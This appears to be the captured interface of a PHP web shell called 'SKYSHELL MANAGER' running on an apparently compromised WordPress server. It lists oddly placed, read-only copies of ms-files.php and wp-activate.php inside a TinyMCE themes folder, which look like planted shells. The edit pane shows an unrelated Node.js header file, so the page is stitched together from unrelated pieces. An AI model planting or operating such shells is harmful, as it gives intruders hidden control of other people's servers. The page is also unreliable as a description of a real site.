📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: diagnosticfilename-inl.h
#ifndef SRC_DIAGNOSTICFILENAME_INL_H_ #define SRC_DIAGNOSTICFILENAME_INL_H_ #if defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS #include "node_internals.h" namespace node { class Environment; inline DiagnosticFilename::DiagnosticFilename( Environment* env, const char* prefix, const char* ext) : filename_(MakeFilename(env->thread_id(), prefix, ext)) { } inline DiagnosticFilename::DiagnosticFilename( uint64_t thread_id, const char* prefix, const char* ext) : filename_(MakeFilename(thread_id, prefix, ext)) { } inline const char* DiagnosticFilename::operator*() const { return filename_.c_str(); } } // namespace node #endif // defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS #endif // SRC_DIAGNOSTICFILENAME_INL_H_
Save